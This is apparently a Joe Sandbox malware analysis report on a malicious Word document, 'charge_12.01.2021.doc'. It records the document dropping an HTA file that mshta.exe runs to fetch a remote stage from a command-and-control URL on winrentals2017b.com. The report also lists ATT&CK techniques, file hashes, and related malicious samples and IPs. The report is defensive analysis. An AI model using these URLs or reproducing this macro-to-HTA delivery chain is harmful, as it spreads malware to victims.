Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting12NTDSFile and Directory Discovery11Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery14SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
charge_12.01.2021.doc20%VirustotalBrowse
charge_12.01.2021.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
winrentals2017b.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu92%VirustotalBrowse
http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu90%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBa0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
winrentals2017b.com
194.62.42.207
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckWINWORD.EXE, 00000000.00000002.531954331.00000000092A7000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.417049273.0000000003377000.00000002.00020000.sdmpfalse
    high
    http://www.windows.com/pctv.mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpfalse
      high
      http://investor.msn.comWINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtWINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpfalse
          high
          http://www.%s.comPAWINWORD.EXE, 00000000.00000002.528805255.0000000004490000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.405382642.0000000001E70000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.405616218.0000000001D60000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.WINWORD.EXE, 00000000.00000002.531954331.00000000092A7000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.417049273.0000000003377000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.WINWORD.EXE, 00000000.00000002.528805255.0000000004490000.00000002.00020000.sdmp, explorer.exe, 00000002.00000002.405382642.0000000001E70000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.405616218.0000000001D60000.00000002.00020000.sdmpfalse
            high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueWINWORD.EXE, 00000000.00000002.531954331.00000000092A7000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.417049273.0000000003377000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oeWINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpfalse
              high
              http://investor.msn.com/WINWORD.EXE, 00000000.00000002.531696202.00000000090C0000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.416843704.0000000003190000.00000002.00020000.sdmpfalse
                high
                http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBamshta.exe, 00000004.00000002.418224211.000000000635A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                194.62.42.207
                winrentals2017b.comRussian Federation
                34464ZEISS-ASRUfalse

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:532355
                Start date:02.12.2021
                Start time:04:19:19
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 51s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:charge_12.01.2021.doc
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal64.expl.winDOC@6/14@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 12
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .doc
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                04:20:16API Interceptor28x Sleep call for process: explorer.exe modified
                04:20:18API Interceptor42x Sleep call for process: mshta.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                ZEISS-ASRUlegal agreement 11.15.2021.docGet hashmaliciousBrowse
                • 194.62.42.147
                legal agreement 11.15.2021.docGet hashmaliciousBrowse
                • 194.62.42.147
                legal agreement 11.15.2021.docGet hashmaliciousBrowse
                • 194.62.42.147
                files_11.15.2021.docGet hashmaliciousBrowse
                • 194.62.42.148
                files_11.15.2021.docGet hashmaliciousBrowse
                • 194.62.42.148
                files_11.15.2021.docGet hashmaliciousBrowse
                • 194.62.42.148
                instruct_11.21.doc.docmGet hashmaliciousBrowse
                • 194.62.42.144
                instruct_11.21.doc.docmGet hashmaliciousBrowse
                • 194.62.42.144
                instruct_11.21.doc.docmGet hashmaliciousBrowse
                • 194.62.42.144
                particulars 11.010.2021.docGet hashmaliciousBrowse
                • 194.62.42.144
                particulars 11.010.2021.docGet hashmaliciousBrowse
                • 194.62.42.144
                inquiry-11.21.docGet hashmaliciousBrowse
                • 194.62.42.45
                inquiry-11.21.docGet hashmaliciousBrowse
                • 194.62.42.45
                inquiry-11.21.docGet hashmaliciousBrowse
                • 194.62.42.45
                bE5TVG6QkV.docmGet hashmaliciousBrowse
                • 194.62.42.31
                bE5TVG6QkV.docmGet hashmaliciousBrowse
                • 194.62.42.31
                pZt5P80bs1.docmGet hashmaliciousBrowse
                • 194.62.42.143
                pZt5P80bs1.docmGet hashmaliciousBrowse
                • 194.62.42.143
                jk2BhrWvzs.docmGet hashmaliciousBrowse
                • 194.62.42.144
                jk2BhrWvzs.docmGet hashmaliciousBrowse
                • 194.62.42.144

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cab3[1].htm
                Process:C:\Windows\SysWOW64\mshta.exe
                File Type:HTML document, ASCII text
                Category:downloaded
                Size (bytes):203
                Entropy (8bit):5.150186571388359
                Encrypted:false
                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3/ZKCezocKqD:J0+oxBeRmR9etdzRx/Fez1T
                MD5:B5FF4C0F214FDF079AE6D835F046B7C5
                SHA1:FC1F09A696C92D366E4868A35A5AFA79129B12BE
                SHA-256:AAF04ECB4C67DE5A7833184F5ABEEC5F48A2FC17BB8167637A421596E00C7E4C
                SHA-512:5DCFA31DD1A704AE698673763A2C3E96F0C7E70D06D4790033B6ECCAFF7E6A55D7D4F2913649915E1AD430E4FA9C68143D82A95A38C2B0BC315AD91099AEAB3A
                Malicious:false
                Reputation:low
                IE Cache URL:http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9
                Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "cab3" was not found on this server.</p>.</body></html>.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF8DB82E.gif
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:GIF image data, version 89a, 774 x 198
                Category:dropped
                Size (bytes):14327
                Entropy (8bit):7.959467120915826
                Encrypted:false
                SSDEEP:384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv
                MD5:76DA3E2154587DD3D69A81FCDB0C7364
                SHA1:0F23E27B3A456B22A11D3FBC3132397B0DDC9357
                SHA-256:F9299AB3483A8F729B2ACA2111B46E9952D4491AC66124FEC22C1C789EBC3139
                SHA-512:A20BA525941043701E8DA5234A286FF2AF0A5F4C45998F1BA3BD59785FF4CDDAA72DE316D0BC651C68F30A6587741539B51D356BF5D6FEEAFCAE492AB277BB45
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: GIF89a.............A..)P..?...........4.............P..K.Uo.f}.v..............=..J..G..M..J..H..F..=..O..L..K..@..<..;..9..5z.R..N..M..M..3v.2s.P..1r.1q.W..F..I..J. K.&Q.Ch.A`.d............C..R.."L.T..A...h..g.*^.%T.O..P..8..4v..@.U..T..S..Q..F..>..S..P..@..2m.[..Y..X..V..R..B..U..T..W..O..T..O.*g.|...............I..M..Q..W...1.W.._..W..]..]..\..[..Z..W..V..C..5p.b..]..[..X..W..Y..Q..O..^..[..Z../a.]..\..Z..^..X.._.._..I..`..]..a..`.!c.!^.%e.$b.&f.)h.5q.>v.H~.Y..h..v.............................N..R..U..X..Z..b..`..\..`..a..b..c..d..O. d. d..R.!f."g."e.!f.#g.,m............._."k..P..9g%m........As*z.)x.,~.+|.+{.&n. \..Gy*v.6..K....../...Bm.........6....;..9..8..A..:..:..3..+l.B..C..F..N..R..T..\..i..@..@..=..A..@..D..=..7.."Uy<..%].K..N.......................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{477B7D15-E68B-42EE-9265-E39BF1B772F7}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):24064
                Entropy (8bit):4.61711360044789
                Encrypted:false
                SSDEEP:192:31tC/c8L5cBp19v3+DQM7wbwM8N0jHa3tY/H8r5cBp19v3+DQM7wbwM8N0jHa:ltmcekv+Mvj8N0jatcHmkv+Mvj8N0j
                MD5:CB1824FD94AC639BBC2FA16B0428D68D
                SHA1:857B6763C495ADC01475B0E6FD8A78BC5FE8E4A1
                SHA-256:5F45665D6EC34D66D8FE61F17AE4F8DF54DEFABE561D5FF517EC7D2C2DDE7CCC
                SHA-512:0F02D723F6AA18D996CE9A9BE6E2C06AE8CD13448B8E9E06B4C1FADDB0B8249FF888ADD05655470A65AF871100E3A49CEC8BC76B470F6B77640CA6492E919621
                Malicious:false
                Reputation:low
                Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................%...................................,....................... ...!..."...#...$...&.......'...(...)...*...+.......-.......................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEA20A45-6520-4724-B440-5537342337CC}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):21070
                Entropy (8bit):2.7051724386748672
                Encrypted:false
                SSDEEP:384:UlKV5yQOUVTs4SULwZ4pPVqHoVTQCOiTY5qFQ5q9eH4TsssHsU9YsqYjQYxtYn9q:ZGQOUVTs4SULwZ4pPVqHoVTQCOiThFJI
                MD5:F21872093625D2BA00E54A3D108AF87C
                SHA1:863CA8B13F268B27CCE55FB2529F6DEB0E3F7FAD
                SHA-256:415D7D16904A8DEFC4E43F7B987E07C6DE35129DA74C02EDF24AA2D09BBE0D65
                SHA-512:2C9244309A1C5DC95AB46FBEE99599DDE2481FE182665F63E9FA6C2958A930B4B312698B0CE6F941F3B1BA81672472F74CBF72851AEE410386C3BE8DCB0B2FAF
                Malicious:false
                Reputation:low
                Preview: ../.<.@.1.h.@.1.t.@.1.m.@.1.l.@.1.>.@.1.<.@.1.b.@.1.o.@.1.d.@.1.y.@.1.>.@.1.<.@.1.d.@.1.i.@.1.v.@.1. .@.1.i.@.1.d.@.1.=.@.1.'.@.1.k.@.1.a.@.1.r.@.1.o.@.1.l.@.1.Y.@.1.o.@.1.u.@.1.'.@.1. .@.1.s.@.1.t.@.1.y.@.1.l.@.1.e.@.1.=.@.1.'.@.1.f.@.1.o.@.1.n.@.1.t.@.1.-.@.1.c.@.1.o.@.1.l.@.1.o.@.1.r.@.1.:.@.1. .@.1.#.@.1.0.@.1.0.@.1.0.@.1.'.@.1.>.@.1.l.@.1.a.@.1.v.@.1.e.@.1.<.@.1./.@.1.d.@.1.i.@.1.v.@.1.>.@.1.<.@.1.d.@.1.i.@.1.v.@.1. .@.1.i.@.1.d.@.1.=.@.1.'.@.1.t.@.1.u.@.1.b.@.1.e.@.1.G.@.1.i.@.1.r.@.1.l.@.1.'.@.1. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F929E0A5-0B20-4288-9DA9-D559EA91D780}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\My Documents.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Dec 2 11:20:15 2021, atime=Thu Dec 2 11:20:15 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):895
                Entropy (8bit):4.475235381678639
                Encrypted:false
                SSDEEP:12:85Qt1lgXg/XAlCPCHaX6zBFbZD4KID3KicvbJIb4uCN1KZ3YilMMEpxRljKXTdXq:85C/XTKz3FkKsheyl2Y3qyZVNZVu/
                MD5:06C90362D402245A0B0BAFA5A3E6531B
                SHA1:6D411C7BAFCCFBDA2233AE29DF9A94016DC49CFD
                SHA-256:A0B8A90325D92635152F8102568FE6C0BB54408D11D32C72A30595C61CCFAC17
                SHA-512:756D21086454E12DB0DF62F9F7D55D076FC2DEBD86D429C2590910786AB9A041AD58D0F6644D90E3BD7286958146ED657040870C12C4C8722B93EDA85AB26AB6
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G..k.^.v...k.^.v.... ......................o....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.......1......S....DOCUME~1..h......QK.X.S..*...[=..............>.....D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.......k...............-...8...[............?J......C:\Users\..#...................\\878164\Users.user\Documents.......\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.............m...............#.F..l.H.i.m...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......878164..........D_....3N...W...9n.[.*.......}EkD_....3N...W...9n.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\charge_12.01.2021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:54 2021, mtime=Mon Aug 30 20:08:54 2021, atime=Thu Dec 2 11:20:11 2021, length=33465, window=hide
                Category:dropped
                Size (bytes):1049
                Entropy (8bit):4.514584183357273
                Encrypted:false
                SSDEEP:12:8BTzsTpA0gXg/XAlCPCHaX6zBFB/z+X+WsL7O/e4icvbT9442WDtZ3YilMMEpxR7:8dvk/XTKz3c2L7jreGoDv3qyQd7Qy
                MD5:E709F4ED79010029EA756E43C97300E0
                SHA1:EB8BF923D3FCFB7C7506DC3746848ECAD22A6785
                SHA-256:7315E9E82BFD64A149C161A616757BFE34938D92548C05C36B06BADA5D0D3EEA
                SHA-512:37E5338794A122E4002DDB9A23F06CCC387F765B4CC1CCA202DBA92F24B190CECB6E4A6FF4298F4CC8246DA75DC832633FF61AD32F3230F20585814BACA0936B
                Malicious:false
                Reputation:low
                Preview: L..................F.... ...v.`=...v.`=...i...v................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S....Desktop.d......QK.X.S..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2......S.b .CHARGE~1.DOC..X.......S...S..*.........................c.h.a.r.g.e._.1.2...0.1...2.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\878164\Users.user\Desktop\charge_12.01.2021.doc.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.h.a.r.g.e._.1.2...0.1...2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......878164..........D_....3N...W...9..g
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):143
                Entropy (8bit):4.8475007361621305
                Encrypted:false
                SSDEEP:3:bDuMJleWSGCKLUlwcXAlWCEKUBCmX1a+CGCKLUlmxWXLRBCv:bCES2UPAk7BE+C2UJLRBs
                MD5:8783DD2CAE71F2E44E75175200CC3C71
                SHA1:59A8D8943F354672ED2E4E1B0B97BC85F4529446
                SHA-256:D3511F772A8D95B4A56063132C49190D6165483DD1005B36647DF6AFB0D4567B
                SHA-512:8B26982B2136CAB23B8068A0C9A20FB0DC06205F7618B39A682C933550C645B4F4FEE65992D84763AB0CB3F32C887C51D44AC2AF8C97D383F3CDB6FED64F377F
                Malicious:false
                Preview: [folders]..Templates.LNK=0..charge_12.01.2021.LNK=0..My Documents.LNK=0..youTube.LNK=0..[doc]..charge_12.01.2021.LNK=0..[misc]..youTube.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\youTube.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 2 11:20:15 2021, mtime=Thu Dec 2 11:20:15 2021, atime=Thu Dec 2 11:20:15 2021, length=3342, window=hide
                Category:modified
                Size (bytes):1025
                Entropy (8bit):4.53172314563644
                Encrypted:false
                SSDEEP:12:8Dwh6FRgXg/XAlCPCHaX6zBFbEDb5KIDhrc7H2NcW1KicvbJIYnYWluCN1KZ3YiU:8P/XTKz3wP5K0Q4eyYYWM2Y3qyR7m
                MD5:0A9A707360E344370C535C595C655FE5
                SHA1:3DBD4D9B42BEBB0718FDD2E70B81CEAC0E500865
                SHA-256:7A90EDFC0B1456A5B5735277C9F2A363BB703A2B7ADF4F9575227104FF0F0FFB
                SHA-512:2A4F0DD8E8101486CEE4B92855D874CF059044E7C637C55E2A201CCB346E7B38947DFBFC6C051B2F9749601681D35A3FB20142922EE1F0D132A4B1D3FAE898FD
                Malicious:false
                Preview: L..................F.... ...k.^.v...k.^.v...r#..v................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.......1......S.b..DOCUME~1..h......QK.X.S.b*...[=..............>.....D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....^.2......S.b .youTube.hta.D......S.b.S.b*.........................y.o.u.T.u.b.e...h.t.a.......w...............-...8...[............?J......C:\Users\..#...................\\878164\Users.user\Documents\youTube.hta.$.....\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.\.y.o.u.T.u.b.e...h.t.a.............m...............#.F..l.H.i.m...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......878164..........D_....3N...W...9..g............[D_....3N...
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\user\Desktop\~$arge_12.01.2021.doc
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\user\Documents\youTube.hta (copy)
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):3342
                Entropy (8bit):5.787478297876638
                Encrypted:false
                SSDEEP:96:iOVvcNLnp15eL/XaxaFD1OIWCOrWETgAgQg+jgMo0Y01MDdq:iOVqb5Sa05OIWCSWETgAgQgKgu1o8
                MD5:55D9EAB53D4063A53B6ED05F7B1E75E7
                SHA1:E6B4C81676D3EF0D2F7D08A6CC2AD90EB54908C3
                SHA-256:C7F40608CE8A3DDA25C13D117790D08EF757B07B8C2CCB645A27A71ADC322FB2
                SHA-512:E90768D87C7B191D41D3944957725DB0E1F29FA865E24FD7308656FC9249CA0A5D1BD0ABEDA3BBC68528EFC0CE6BC3A79EB434C375FD5C6EC90455C6E19A74F9
                Malicious:false
